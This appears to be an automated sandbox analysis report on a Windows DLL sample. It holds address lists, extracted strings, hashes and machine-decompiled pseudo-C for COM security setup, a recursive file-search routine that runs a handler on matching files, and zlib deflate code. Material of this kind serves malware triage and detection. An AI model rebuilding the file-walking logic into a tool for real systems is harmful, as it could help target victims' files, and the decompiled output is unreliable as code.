0x100159f5
0x100159e4
0x100159e9
0x100159e9
0x100159f8
0x100159fe
0x10015a17
0x10015a00
0x10015a08
0x10015a08
0x10015a1d
0x10015a22
0x10015a22
0x10015475
0x10015476
0x10015477
0x10015478
0x10015479
0x1001547d
0x10015484
0x10015485
0x10015486
0x10015487
0x10015489
0x100154cf
0x100154cf
0x100154d9
0x100154d9
0x100154da
0x100154db
0x100154dc
0x00000000
0x100154dc
0x1001548d
0x10015495
0x00000000
0x100154a7
0x100154ac
0x100154b7
0x00000000
0x100154c3
0x100154c3
0x00000000
0x100154c3
0x100154b7
0x10015495
0x100156fc
0x100156fe
0x10015701
0x10015703
0x10015707
0x1001570a
0x1001570f
0x10015712
0x10015715
0x1001571c
0x1001571c
0x10015722
0x10015724
0x10015727
0x1001572a
0x1001572d
0x10015730
0x10015733
0x10015733
0x10015736
0x10015739
0x1001573c
0x1001573f
0x10015742
0x10015742
0x10015745
0x10015748
0x1001574c
0x00000000
0x00000000
0x10015769
0x1001576e
0x10015856
0x00000000
0x00000000
0x1001585f
0x10015862
0x1001586e
0x00000000
0x1001586e
0x10015774
0x10015777
0x10015779
0x1001577c
0x1001577f
0x10015782
0x1001578b
0x1001578b
0x1001578d
0x10015793
0x10015795
0x10015798
0x1001579b
0x1001579e
0x100157a1
0x100157a4
0x100157a4
0x100157ab
0x100157ae
0x100157b1
0x100157b4
0x100157b7
0x100157b7
0x100157bc
0x100157bf
0x100157c1
0x100157c6
0x00000000
0x00000000
0x1001587a
0x00000000
0x00000000
0x10015883
0x10015886
0x10015896
0x10015896
0x100157cc
0x100157cf
0x1001582b
0x100157e5
0x100157e5
0x100157eb
0x100157f1
0x100158a2
0x100158a6
0x100158a8
0x100158ae
0x00000000
0x00000000
0x100158b4
0x100158bb
0x100158dd
0x100158e3
0x1001590f
0x10015913
0x10015915
0x10015917
0x10015917
0x10015917
0x1001591b
0x1001591b
0x100158e5
0x100158eb
0x100158ed
0x100158f1
0x100158f3
0x100158f5
0x100158f5
0x100158f5
0x100158f7
0x100158fb
0x10015901
0x10015903
0x10015905
0x10015905
0x10015905
0x10015909
0x10015909
0x10015901
0x100158f1
0x100158bd
0x100158bf
0x100158c3
0x100158c5
0x100158c7
0x100158c7
0x100158c7
0x100158cb
0x100158cb
0x100158c3
0x1001591d
0x1001591f
0x1001591f
0x1001591f
0x10015921
0x10015925
0x00000000
0x10015925
0x100157fb
0x100157fd
0x10015802
0x1001580a
0x1001580d
0x10015810
0x10015816
0x10015816
0x10015816
0x10015818
0x1001581c
0x00000000
0x10015833
0x10015833
0x10015836
0x10015838
0x1001583b
0x1001583e
0x10015841
0x10015844
0x10015847
0x10015847
0x10015847
0x10015849
0x10015752
0x10015756
0x00000000
0x00000000
0x00000000
0x10015756
0x1001582b
0x100157d1
0x100157d4
0x100157d7
0x100157da
0x100157e3
0x00000000
0x100157e3
0x1001574e
0x10015751
0x00000000
0x1001575c
0x1001575c
0x00000000
0x10015762

Strings

Genu, xrefs: 1001548F
invalid distance code, xrefs: 1001592E
invalid distance too far back, xrefs: 1001595A
ntel, xrefs: 10015497
invalid literal/length code, xrefs: 1001594A
ineI, xrefs: 1001549F

Memory Dump Source

Source File: 00000000.00000002.697052949.0000000010001000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.697045177.0000000010000000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID: Genu$ineI$invalid distance code$invalid distance too far back$invalid literal/length code$ntel
API String ID: 0-3089872807
Opcode ID: 06c06f8f757cebf00b6328368a045d6cb72c8d0c19ae02dd583fa473f6032e91
Instruction ID: df573eda0294624fdf6872f86a3b68269dceab1b823458b8d2ff77a7191766b5
Opcode Fuzzy Hash: 06c06f8f757cebf00b6328368a045d6cb72c8d0c19ae02dd583fa473f6032e91
Instruction Fuzzy Hash: F7121731A08752CFD715DE38C49020AB7E2EB88396F59862DE895DFB41D376DD88CB81

Uniqueness

Uniqueness Score: -1.00%

Function 1000D52E, Relevance: 7.6, APIs: 5, Instructions: 87
commemoryCOMMON

Download Yara Rule

C-Code - Quality: 30%

			E1000D52E(void* __ecx) {
				char _v8;
				void* _v12;
				char* _t15;
				intOrPtr* _t16;
				void* _t21;
				intOrPtr* _t23;
				intOrPtr* _t24;
				intOrPtr* _t25;
				void* _t30;
				void* _t33;

				_v12 = 0;
				_v8 = 0;
				__imp__CoInitializeEx(0, 0, _t30, _t33, __ecx, __ecx);
				__imp__CoInitializeSecurity(0, 0xffffffff, 0, 0, 0, 3, 0, 0, 0);
				_t15 =  &_v12;
				__imp__CoCreateInstance(0x1001b840, 0, 1, 0x1001b850, _t15);
				if(_t15 < 0) {
					L5:
					_t23 = _v8;
					if(_t23 != 0) {
						 *((intOrPtr*)( *_t23 + 8))(_t23);
					}
					_t24 = _v12;
					if(_t24 != 0) {
						 *((intOrPtr*)( *_t24 + 8))(_t24);
					}
					_t16 = 0;
				} else {
					__imp__#2(__ecx);
					_t25 = _v12;
					_t21 =  *((intOrPtr*)( *_t25 + 0xc))(_t25, _t15, 0, 0, 0, 0, 0, 0,  &_v8);
					if(_t21 < 0) {
						goto L5;
					} else {
						__imp__CoSetProxyBlanket(_v8, 0xa, 0, 0, 3, 3, 0, 0);
						if(_t21 < 0) {
							goto L5;
						} else {
							_t16 = E100085EA(8);
							if(_t16 == 0) {
								goto L5;
							} else {
								 *((intOrPtr*)(_t16 + 4)) = _v12;
								 *_t16 = _v8;
							}
						}
					}
				}
				return _t16;
			}

0x1000d53b
0x1000d53e
0x1000d541
0x1000d552
0x1000d558
0x1000d569
0x1000d571
0x1000d5c2
0x1000d5c2
0x1000d5c7
0x1000d5cc
0x1000d5cc
0x1000d5cf
0x1000d5d4
0x1000d5d9
0x1000d5d9
0x1000d5dc
0x1000d573
0x1000d574
0x1000d57a
0x1000d58b
0x1000d590
0x00000000
0x1000d592
0x1000d59f
0x1000d5a7
0x00000000
0x1000d5a9
0x1000d5ab
0x1000d5b3
0x00000000
0x1000d5b5
0x1000d5b8
0x1000d5be
0x1000d5be
0x1000d5b3
0x1000d5a7
0x1000d590
0x1000d5e1

APIs

CoInitializeEx.OLE32(00000000,00000000,00000000,?,00000000,00000000,?,1000D82E,00000C5B,00000000,?,00000000), ref: 1000D541
CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000,?,1000D82E,00000C5B,00000000,?,00000000), ref: 1000D552
CoCreateInstance.OLE32(1001B840,00000000,00000001,1001B850,?,?,1000D82E,00000C5B,00000000,?,00000000), ref: 1000D569
SysAllocString.OLEAUT32(00000000), ref: 1000D574
CoSetProxyBlanket.OLE32(00000000,0000000A,00000000,00000000,00000003,00000003,00000000,00000000,?,1000D82E,00000C5B,00000000,?,00000000), ref: 1000D59F

Part of subcall function 100085EA: HeapAlloc.KERNEL32(00000008,?,?,10008F6A,00000100,?,10005FA8), ref: 100085F8

Memory Dump Source

Source File: 00000000.00000002.697052949.0000000010001000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.697045177.0000000010000000.00000002.00020000.sdmp Download File

Similarity

API ID: AllocInitialize$BlanketCreateHeapInstanceProxySecurityString
String ID:
API String ID: 2855449287-0
Opcode ID: f30b641bcf0aa0fe1c904c3557c566646e3f16f6a2450ffed76bd1eba4bc5383
Instruction ID: f9fb2e14203abb558b51dae657c8012b2cf373e276ee73c0d93c46e05e0496eb
Opcode Fuzzy Hash: f30b641bcf0aa0fe1c904c3557c566646e3f16f6a2450ffed76bd1eba4bc5383
Instruction Fuzzy Hash: A821E471600255BBEB249B62CC4DE6FBFBCEFC6B55F11415DB906AA290CA70DA41CA30

Uniqueness

Uniqueness Score: -1.00%

Function 1000AE9A, Relevance: 3.1, APIs: 2, Instructions: 113
fileCOMMON

Download Yara Rule

C-Code - Quality: 78%

			E1000AE9A(void* __ecx, void* __fp0, intOrPtr _a16) {
				char _v12;
				WCHAR* _v16;
				short _v560;
				short _v562;
				struct _WIN32_FIND_DATAW _v608;
				WCHAR* _t27;
				void* _t31;
				int _t36;
				intOrPtr _t37;
				intOrPtr _t44;
				void* _t48;
				intOrPtr _t49;
				void* _t51;
				intOrPtr _t56;
				void* _t61;
				char _t62;
				void* _t63;
				void* _t64;
				void* _t65;
				void* _t80;

				_t80 = __fp0;
				_push(0);
				_t51 = __ecx;
				_push(L"\\*");
				_t27 = E100092CB(__ecx);
				_t65 = _t64 + 0xc;
				_v16 = _t27;
				if(_t27 == 0) {
					return _t27;
				}
				_t61 = FindFirstFileW(_t27,  &_v608);
				if(_t61 == 0xffffffff) {
					L18:
					return E10008600( &_v16, 0xfffffffe);
				}
				_t31 = 0x2e;
				do {
					if(_v608.cFileName != _t31 || _v562 != 0 && (_v562 != _t31 || _v560 != 0)) {
						if((_v608.dwFileAttributes & 0x00000010) != 0) {
							L14:
							_push(0);
							_push( &(_v608.cFileName));
							_push("\\");
							_t62 = E100092CB(_t51);
							_t65 = _t65 + 0x10;
							_v12 = _t62;
							if(_t62 != 0) {
								_t56 =  *0x1001e684; // 0x306f878
								 *((intOrPtr*)(_t56 + 0xb4))(1);
								_push(1);
								_push(1);
								_push(0);
								E1000AE9A(_t62, _t80, 1, 5, E1000EFB5, _a16);
								_t65 = _t65 + 0x1c;
								E10008600( &_v12, 0xfffffffe);
							}
							goto L16;
						}
						_t63 = 0;
						do {
							_t10 = _t63 + 0x1001e78c; // 0x0
							_push( *_t10);
							_push( &(_v608.cFileName));
							_t44 =  *0x1001e690; // 0x306fb18
							if( *((intOrPtr*)(_t44 + 0x18))() == 0) {
								goto L12;
							}
							_t48 = E1000EFB5(_t80, _t51,  &_v608, _a16);
							_t65 = _t65 + 0xc;
							if(_t48 == 0) {
								break;
							}
							_t49 =  *0x1001e684; // 0x306f878
							 *((intOrPtr*)(_t49 + 0xb4))(1);
							L12:
							_t63 = _t63 + 4;
						} while (_t63 < 4);
						if((_v608.dwFileAttributes & 0x00000010) == 0) {
							goto L16;
						}
						goto L14;
					}
					L16:
					_t36 = FindNextFileW(_t61,  &_v608);
					_t31 = 0x2e;
				} while (_t36 != 0);
				_t37 =  *0x1001e684; // 0x306f878
				 *((intOrPtr*)(_t37 + 0x78))(_t61);
				goto L18;
			}

0x1000ae9a
0x1000aea6
0x1000aea8
0x1000aeaa
0x1000aeb0
0x1000aeb5
0x1000aeb8
0x1000aebd
0x1000aff7
0x1000aff7
0x1000aed1
0x1000aed6
0x1000afe6
0x00000000
0x1000aff2
0x1000aede
0x1000aedf
0x1000aee6
0x1000af15
0x1000af68
0x1000af68
0x1000af70
0x1000af71
0x1000af7c
0x1000af7e
0x1000af81
0x1000af86
0x1000af88
0x1000af90
0x1000af96
0x1000af98
0x1000af9a
0x1000afaf
0x1000afb4
0x1000afbd
0x1000afc3
0x00000000
0x1000af86
0x1000af17
0x1000af19
0x1000af19
0x1000af19
0x1000af25
0x1000af26
0x1000af30
0x00000000
0x00000000
0x1000af3d
0x1000af42
0x1000af47
0x00000000
0x00000000
0x1000af49
0x1000af50
0x1000af56
0x1000af56
0x1000af59
0x1000af66
0x00000000
0x00000000
0x00000000
0x1000af66
0x1000afc4
0x1000afcc
0x1000afd6
0x1000afd6
0x1000afdd
0x1000afe3
0x00000000

APIs

FindFirstFileW.KERNEL32(00000000,?,00000000,00000000,?), ref: 1000AECB
FindNextFileW.KERNEL32(00000000,?), ref: 1000AFCC

Memory Dump Source

Source File: 00000000.00000002.697052949.0000000010001000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.697045177.0000000010000000.00000002.00020000.sdmp Download File

Similarity

API ID: FileFind$FirstNext
String ID:
API String ID: 1690352074-0
Opcode ID: ccf32ac4a9f5a782a5e194b7ff0c809da3928f0d5b0b92b1d1419007f1e5e171
Instruction ID: 187bc6246b44e78c00983fbb8b3d073dc18552681f4b71f7fcb5beed15ff1c60
Opcode Fuzzy Hash: ccf32ac4a9f5a782a5e194b7ff0c809da3928f0d5b0b92b1d1419007f1e5e171
Instruction Fuzzy Hash: 6231C271E0021A6AFB10DBE4DC89FAA73A8EB057D0F1102A5F605AA1D5E771DEC0CB55

Uniqueness

Uniqueness Score: -1.00%

Function 100097F2, Relevance: 1.5, APIs: 1, Instructions: 24timeCOMMON

Download Yara Rule

APIs

GetSystemTimeAsFileTime.KERNEL32(?,?,10005F8C), ref: 100097FF

Memory Dump Source

Source File: 00000000.00000002.697052949.0000000010001000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.697045177.0000000010000000.00000002.00020000.sdmp Download File

Similarity

API ID: Time$FileSystem
String ID:
API String ID: 2086374402-0
Opcode ID: 6d43f392a9e5e6da40ccce35754df6dc923eb91be77840cb2dd00ce09bfb791b
Instruction ID: b389187439d6018aa84707da5f063cbd2e4e48121c1f2061a12694a54993187a
Opcode Fuzzy Hash: 6d43f392a9e5e6da40ccce35754df6dc923eb91be77840cb2dd00ce09bfb791b
Instruction Fuzzy Hash: EDE04FBA9003186FD710EFA8DD46BAABBFDEB84A50F118554AC85B7348E570EE048790

Uniqueness

Uniqueness Score: -1.00%

Function 10016EC0, Relevance: .4, Instructions: 359
COMMONCrypto

Download Yara Rule

C-Code - Quality: 99%

			E10016EC0(intOrPtr _a4, signed int _a8, signed int _a12) {
				signed int _v8;
				signed short* _v12;
				char _v16;
				signed short _v20;
				unsigned int _v24;
				signed short _v28;
				signed int _t223;
				signed int _t235;
				signed int _t237;
				signed short _t240;
				signed int _t241;
				signed short _t244;
				signed int _t245;
				signed short _t248;
				signed int _t249;
				signed int _t250;
				void* _t254;
				signed char _t259;
				signed int _t275;
				signed int _t289;
				signed int _t308;
				signed short _t316;
				signed int _t321;
				void* _t329;
				signed short _t330;
				signed short _t333;
				signed short _t334;
				signed short _t343;
				signed short _t346;
				signed short _t347;
				signed short _t348;
				signed short _t358;
				signed short _t361;
				signed short _t362;
				signed short _t363;
				signed short _t370;
				signed int _t373;
				signed int _t378;
				signed short _t379;
				signed short _t382;
				unsigned int _t388;
				unsigned short _t390;
				unsigned short _t392;
				unsigned short _t394;
				signed int _t396;
				signed int _t397;
				signed int _t398;
				signed int _t400;
				signed short _t401;
				signed int _t402;
				signed int _t403;
				signed int _t407;
				signed int _t409;

				_t223 = _a8;
				_t235 =  *(_t223 + 2) & 0x0000ffff;
				_push(_t397);
				_t388 = 0;
				_t398 = _t397 | 0xffffffff;
				if(_a12 < 0) {
					L42:
					return _t223;
				} else {
					_t329 =  !=  ? 7 : 0x8a;
					_v12 = _t223 + 6;
					_t254 = (0 | _t235 != 0x00000000) + 3;
					_v16 = _a12 + 1;
					do {
						_v24 = _t388;
						_t388 = _t388 + 1;
						_a8 = _t235;
						_a12 = _t235;
						_v8 =  *_v12 & 0x0000ffff;
						_t223 = _a4;
						if(_t388 >= _t329) {
							L4:
							if(_t388 >= _t254) {
								if(_a8 == 0) {
									_t122 = _t223 + 0x16bc; // 0x8b3c7e89
									_t400 =  *_t122;
									if(_t388 > 0xa) {
										_t168 = _t223 + 0xac4; // 0x5dc03300
										_t330 =  *_t168 & 0x0000ffff;
										_t169 = _t223 + 0xac6; // 0x55c35dc0
										_t237 =  *_t169 & 0x0000ffff;
										_v24 = _t330;
										_t171 = _t223 + 0x16b8; // 0xfffffe8b
										_t333 = (_t330 << _t400 |  *_t171) & 0x0000ffff;
										_v28 = _t333;
										if(_t400 <= 0x10 - _t237) {
											_t259 = _t400 + _t237;
										} else {
											_t173 = _t223 + 0x14; // 0xc703f045
											 *(_t223 + 0x16b8) = _t333;
											_t175 = _t223 + 8; // 0x8d000040
											 *((char*)( *_t175 +  *_t173)) = _v28;
											_t223 = _a4;
											 *((intOrPtr*)(_t223 + 0x14)) =  *((intOrPtr*)(_t223 + 0x14)) + 1;
											_t181 = _t223 + 0x14; // 0xc703f045
											_t182 = _t223 + 8; // 0x8d000040
											_t183 = _t223 + 0x16b9; // 0x89fffffe
											 *((char*)( *_t181 +  *_t182)) =  *_t183;
											 *((intOrPtr*)(_t223 + 0x14)) =  *((intOrPtr*)(_t223 + 0x14)) + 1;
											_t333 = _v24 >> 0x10;
											_t189 = _t223 + 0x16bc; // 0x8b3c7e89
											_t259 =  *_t189 + 0xfffffff0 + _t237;
										}
										_t334 = _t333 & 0x0000ffff;
										 *(_t223 + 0x16bc) = _t259;
										 *(_t223 + 0x16b8) = _t334;
										_t401 = _t334 & 0x0000ffff;
										if(_t259 <= 9) {
											_t209 = _t388 - 0xb; // -10
											 *(_t223 + 0x16b8) = _t209 << _t259 | _t401;
											 *(_t223 + 0x16bc) = _t259 + 7;
										} else {
											_t193 = _t223 + 8; // 0x8d000040
											_t390 = _t388 + 0xfffffff5;
											_t194 = _t223 + 0x14; // 0xc703f045
											_t240 = _t390 << _t259 | _t401;
											 *(_t223 + 0x16b8) = _t240;
											 *( *_t193 +  *_t194) = _t240;
											 *((intOrPtr*)(_t223 + 0x14)) =  *((intOrPtr*)(_t223 + 0x14)) + 1;
											_t199 = _t223 + 0x14; // 0xc703f045
											_t200 = _t223 + 8; // 0x8d000040
											_t201 = _t223 + 0x16b9; // 0x89fffffe
											 *((char*)( *_t199 +  *_t200)) =  *_t201;
											 *((intOrPtr*)(_t223 + 0x14)) =  *((intOrPtr*)(_t223 + 0x14)) + 1;
											 *(_t223 + 0x16bc) =  *(_t223 + 0x16bc) + 0xfffffff7;
											 *(_t223 + 0x16b8) = _t390 >> 0x10;
										}
										goto L35;
									}
									_t123 = _t223 + 0xac0; // 0x4e9
									_t343 =  *_t123 & 0x0000ffff;
									_t124 = _t223 + 0xac2; // 0x33000000
									_t241 =  *_t124 & 0x0000ffff;
									_v24 = _t343;
									_t126 = _t223 + 0x16b8; // 0xfffffe8b
									_t346 = (_t343 << _t400 |  *_t126) & 0x0000ffff;
									_v28 = _t346;
									if(_t400 > 0x10 - _t241) {
										_t128 = _t223 + 0x14; // 0xc703f045
										 *(_t223 + 0x16b8) = _t346;
										_t130 = _t223 + 8; // 0x8d000040
										 *((char*)( *_t130 +  *_t128)) = _v28;
										_t223 = _a4;
										 *((intOrPtr*)(_t223 + 0x14)) =  *((intOrPtr*)(_t223 + 0x14)) + 1;
										_t136 = _t223 + 0x14; // 0xc703f045
										_t137 = _t223 + 8; // 0x8d000040
										_t138 = _t223 + 0x16b9; // 0x89fffffe
										 *((char*)( *_t136 +  *_t137)) =  *_t138;
										_t142 = _t223 + 0x16bc; // 0x8b3c7e89
										 *((intOrPtr*)(_t223 + 0x14)) =  *((intOrPtr*)(_t223 + 0x14)) + 1;
										_t346 = _v24 >> 0x10;
										_t400 =  *_t142 + 0xfffffff0;
									}
									_t403 = _t400 + _t241;
									_t347 = _t346 & 0x0000ffff;
									 *(_t223 + 0x16bc) = _t403;
									 *(_t223 + 0x16b8) = _t347;
									_t348 = _t347 & 0x0000ffff;
									if(_t403 <= 0xd) {
										_t163 = _t403 + 3; // 0x8b3c7e8c
										_t275 = _t163;
										L28:
										 *(_t223 + 0x16bc) = _t275;
										_t165 = _t388 - 3; // -2
										_t166 = _t223 + 0x16b8; // 0xfffffe8b
										 *(_t223 + 0x16b8) = (_t165 << _t403 |  *_t166 & 0x0000ffff) & 0x0000ffff;
									} else {
										_t392 = _t388 + 0xfffffffd;
										_t147 = _t223 + 0x14; // 0xc703f045
										_t244 = _t392 << _t403 | _t348;
										_t148 = _t223 + 8; // 0x8d000040
										 *(_t223 + 0x16b8) = _t244;
										 *( *_t148 +  *_t147) = _t244;
										 *((intOrPtr*)(_t223 + 0x14)) =  *((intOrPtr*)(_t223 + 0x14)) + 1;
										_t153 = _t223 + 0x14; // 0xc703f045
										_t154 = _t223 + 8; // 0x8d000040
										_t155 = _t223 + 0x16b9; // 0x89fffffe
										 *((char*)( *_t153 +  *_t154)) =  *_t155;
										 *((intOrPtr*)(_t223 + 0x14)) =  *((intOrPtr*)(_t223 + 0x14)) + 1;
										 *(_t223 + 0x16bc) =  *(_t223 + 0x16bc) + 0xfffffff3;
										 *(_t223 + 0x16b8) = _t392 >> 0x00000010 & 0x0000ffff;
									}
									goto L35;
								}
								_t289 = _a12;
								if(_t289 != _t398) {
									_t53 = _t289 * 4; // 0x238830a
									_t396 =  *(_t223 + _t53 + 0xa7e) & 0x0000ffff;
									_t56 = _t235 * 4; // 0x830a74c0
									_t370 =  *(_t223 + _t56 + 0xa7c) & 0x0000ffff;
									_t58 = _t223 + 0x16bc; // 0x8b3c7e89
									_t407 =  *_t58;
									_v28 = _t370;
									_t60 = _t223 + 0x16b8; // 0xfffffe8b
									_t249 = (_t370 << _t407 |  *_t60) & 0x0000ffff;
									if(_t407 <= 0x10 - _t396) {
										_t373 = _t249;
										_t308 = _t407 + _t396;
									} else {
										_t61 = _t223 + 0x14; // 0xc703f045
										_t62 = _t223 + 8; // 0x8d000040
										 *(_t223 + 0x16b8) = _t249;
										 *( *_t62 +  *_t61) = _t249;
										 *((intOrPtr*)(_t223 + 0x14)) =  *((intOrPtr*)(_t223 + 0x14)) + 1;
										_t67 = _t223 + 0x14; // 0xc703f045
										_t68 = _t223 + 8; // 0x8d000040
										_t69 = _t223 + 0x16b9; // 0x89fffffe
										 *((char*)( *_t67 +  *_t68)) =  *_t69;
										 *((intOrPtr*)(_t223 + 0x14)) =  *((intOrPtr*)(_t223 + 0x14)) + 1;
										_t75 = _t223 + 0x16bc; // 0x8b3c7e89
										_t373 = _v28 >> 0x00000010 & 0x0000ffff;
										_t308 =  *_t75 + 0xfffffff0 + _t396;
									}
									_t388 = _v24;
									 *(_t223 + 0x16bc) = _t308;
									 *(_t223 + 0x16b8) = _t373;
								}
								_t80 = _t223 + 0xabc; // 0x5d0674c0
								_t358 =  *_t80 & 0x0000ffff;
								_t81 = _t223 + 0x16bc; // 0x8b3c7e89
								_t402 =  *_t81;
								_t82 = _t223 + 0xabe; // 0x4e95d06
								_t245 =  *_t82 & 0x0000ffff;
								_v24 = _t358;
								_t84 = _t223 + 0x16b8; // 0xfffffe8b
								_t361 = (_t358 << _t402 |  *_t84) & 0x0000ffff;
								_v28 = _t361;
								if(_t402 > 0x10 - _t245) {
									_t86 = _t223 + 0x14; // 0xc703f045
									 *(_t223 + 0x16b8) = _t361;
									_t88 = _t223 + 8; // 0x8d000040
									 *((char*)( *_t88 +  *_t86)) = _v28;
									_t223 = _a4;
									 *((intOrPtr*)(_t223 + 0x14)) =  *((intOrPtr*)(_t223 + 0x14)) + 1;
									_t94 = _t223 + 0x14; // 0xc703f045
									_t95 = _t223 + 8; // 0x8d000040
									_t96 = _t223 + 0x16b9; // 0x89fffffe
									 *((char*)( *_t94 +  *_t95)) =  *_t96;
									_t100 = _t223 + 0x16bc; // 0x8b3c7e89
									 *((intOrPtr*)(_t223 + 0x14)) =  *((intOrPtr*)(_t223 + 0x14)) + 1;
									_t361 = _v24 >> 0x10;
									_t402 =  *_t100 + 0xfffffff0;
								}
								_t403 = _t402 + _t245;
								_t362 = _t361 & 0x0000ffff;
								 *(_t223 + 0x16bc) = _t403;
								 *(_t223 + 0x16b8) = _t362;
								_t363 = _t362 & 0x0000ffff;
								if(_t403 <= 0xe) {
									_t121 = _t403 + 2; // 0x8b3c7e8b
									_t275 = _t121;
									goto L28;
								} else {
									_t394 = _t388 + 0xfffffffd;
									_t105 = _t223 + 0x14; // 0xc703f045
									_t248 = _t394 << _t403 | _t363;
									_t106 = _t223 + 8; // 0x8d000040
									 *(_t223 + 0x16b8) = _t248;
									 *( *_t106 +  *_t105) = _t248;
									 *((intOrPtr*)(_t223 + 0x14)) =  *((intOrPtr*)(_t223 + 0x14)) + 1;
									_t111 = _t223 + 0x14; // 0xc703f045
									_t112 = _t223 + 8; // 0x8d000040
									_t113 = _t223 + 0x16b9; // 0x89fffffe
									 *((char*)( *_t111 +  *_t112)) =  *_t113;
									 *((intOrPtr*)(_t223 + 0x14)) =  *((intOrPtr*)(_t223 + 0x14)) + 1;
									 *(_t223 + 0x16bc) =  *(_t223 + 0x16bc) + 0xfffffff2;
									 *(_t223 + 0x16b8) = _t394 >> 0x00000010 & 0x0000ffff;
									goto L35;
								}
							} else {
								_t316 = _t223 + (_t235 + 0x29f) * 4;
								_v28 = _t316;
								do {
									_t378 = _a12;
									_t22 = _t223 + 0x16bc; // 0x8b3c7e89
									_t409 =  *_t22;
									_t24 = _t378 * 4; // 0x238830a
									_t250 =  *(_t223 + _t24 + 0xa7e) & 0x0000ffff;
									_t379 =  *_t316 & 0x0000ffff;
									_v24 = _t379;
									_t27 = _t223 + 0x16b8; // 0xfffffe8b
									_t382 = (_t379 << _t409 |  *_t27) & 0x0000ffff;
									_v20 = _t382;
									if(_t409 <= 0x10 - _t250) {
										_t321 = _t409 + _t250;
									} else {
										_t29 = _t223 + 0x14; // 0xc703f045
										 *(_t223 + 0x16b8) = _t382;
										_t31 = _t223 + 8; // 0x8d000040
										 *((char*)( *_t31 +  *_t29)) = _v20;
										_t223 = _a4;
										 *((intOrPtr*)(_t223 + 0x14)) =  *((intOrPtr*)(_t223 + 0x14)) + 1;
										_t37 = _t223 + 0x14; // 0xc703f045
										_t38 = _t223 + 8; // 0x8d000040
										_t39 = _t223 + 0x16b9; // 0x89fffffe
										 *((char*)( *_t37 +  *_t38)) =  *_t39;
										 *((intOrPtr*)(_t223 + 0x14)) =  *((intOrPtr*)(_t223 + 0x14)) + 1;
										_t382 = _v24 >> 0x10;
										_t45 = _t223 + 0x16bc; // 0x8b3c7e89
										_t321 =  *_t45 + 0xfffffff0 + _t250;
									}
									 *(_t223 + 0x16bc) = _t321;
									_t316 = _v28;
									 *(_t223 + 0x16b8) = _t382 & 0x0000ffff;
									_t388 = _t388 - 1;
								} while (_t388 != 0);
								L35:
								_t235 = _v8;
								_t388 = 0;
								_t398 = _a12;
								if(_t235 != 0) {
									if(_a8 != _t235) {
										_t329 = 7;
										_t217 = _t329 - 3; // 0x4
										_t254 = _t217;
									} else {
										_t329 = 6;
										_t216 = _t329 - 3; // 0x3
										_t254 = _t216;
									}
								} else {
									_t329 = 0x8a;
									_t214 = _t388 + 3; // 0x3
									_t254 = _t214;
								}
								goto L41;
							}
						}
						_t223 = _a4;
						if(_t235 == _v8) {
							_t235 = _v8;
							goto L41;
						}
						goto L4;
						L41:
						_v12 =  &(_v12[2]);
						_t221 =  &_v16;
						 *_t221 = _v16 - 1;
					} while ( *_t221 != 0);
					goto L42;
				}
			}

0x10016ec3
0x10016eca
0x10016ece
0x10016ed0
0x10016ed2
0x10016ed8
0x100173c5
0x100173cb
0x10016ede
0x10016eea
0x10016ef7
0x10016efa
0x10016f01
0x10016f04
0x10016f07
0x10016f0a
0x10016f0b
0x10016f0e
0x10016f14
0x10016f17
0x10016f1c
0x10016f2c
0x10016f2e
0x10016fe4
0x10017173
0x10017173
0x1001717c
0x1001728f
0x1001728f
0x10017296
0x10017296
0x1001729f
0x100172ac
0x100172b5
0x100172b8
0x100172bd
0x10017305
0x100172bf
0x100172bf
0x100172c2
0x100172c9
0x100172cf
0x100172d2
0x100172d5
0x100172d8
0x100172db
0x100172de
0x100172e4
0x100172f2
0x100172f5
0x100172f8
0x10017301
0x10017301
0x10017308
0x1001730b
0x10017311
0x10017318
0x1001731e
0x1001736c
0x10017378
0x1001737f
0x10017320
0x10017320
0x10017323
0x1001732c
0x1001732f
0x10017332
0x10017339
0x1001733c
0x1001733f
0x10017342
0x10017345
0x1001734b
0x10017356
0x1001735c
0x10017363
0x10017363
0x00000000
0x1001731e
0x10017182
0x10017182
0x10017189
0x10017189
0x10017192
0x1001719f
0x100171a8
0x100171ab
0x100171b0
0x100171b2
0x100171b5
0x100171bc
0x100171c2
0x100171c5
0x100171c8
0x100171cb
0x100171ce
0x100171d1
0x100171d7
0x100171e5
0x100171eb
0x100171ee
0x100171f1
0x100171f1
0x100171f4
0x100171f6
0x100171f9
0x100171ff
0x10017206
0x1001720c
0x10017265
0x10017265
0x10017268
0x10017268
0x1001726e
0x10017276
0x10017283
0x1001720e
0x1001720e
0x10017219
0x1001721c
0x1001721f
0x10017222
0x10017229
0x1001722c
0x1001722f
0x10017232
0x10017235
0x1001723b
0x10017247
0x1001724c
0x10017259
0x10017259
0x00000000
0x1001720c
0x10016fea
0x10016fef
0x10016ff5
0x10016ff5
0x10016ffd
0x10016ffd
0x10017005
0x10017005
0x1001700d
0x1001701a
0x10017023
0x10017028
0x1001706d
0x1001706f
0x1001702a
0x1001702a
0x1001702d
0x10017030
0x10017037
0x1001703a
0x1001703d
0x10017040
0x10017043
0x10017049
0x10017057
0x1001705d
0x10017066
0x10017069
0x10017069
0x10017072
0x10017075
0x1001707b
0x1001707b
0x10017082
0x10017082
0x10017089
0x10017089
0x10017091
0x10017091
0x10017098
0x100170a5
0x100170ae
0x100170b1
0x100170b6
0x100170b8
0x100170bb
0x100170c2
0x100170c8
0x100170cb
0x100170ce
0x100170d1
0x100170d4
0x100170d7
0x100170dd
0x100170eb
0x100170f1
0x100170f4
0x100170f7
0x100170f7
0x100170fa
0x100170fc
0x100170ff
0x10017105
0x1001710c
0x10017112
0x1001716b
0x1001716b
0x00000000
0x10017114
0x10017114
0x1001711f
0x10017122
0x10017125
0x10017128
0x1001712f
0x10017132
0x10017135
0x10017138
0x1001713b
0x10017141
0x1001714d
0x10017152
0x1001715f
0x00000000
0x1001715f
0x10016f34
0x10016f3a
0x10016f3d
0x10016f40
0x10016f40
0x10016f43
0x10016f43
0x10016f49
0x10016f49
0x10016f51
0x10016f56
0x10016f63
0x10016f6c
0x10016f6f
0x10016f74
0x10016fbc
0x10016f76
0x10016f76
0x10016f79
0x10016f80
0x10016f86
0x10016f89
0x10016f8c
0x10016f8f
0x10016f92
0x10016f95
0x10016f9b
0x10016fa9
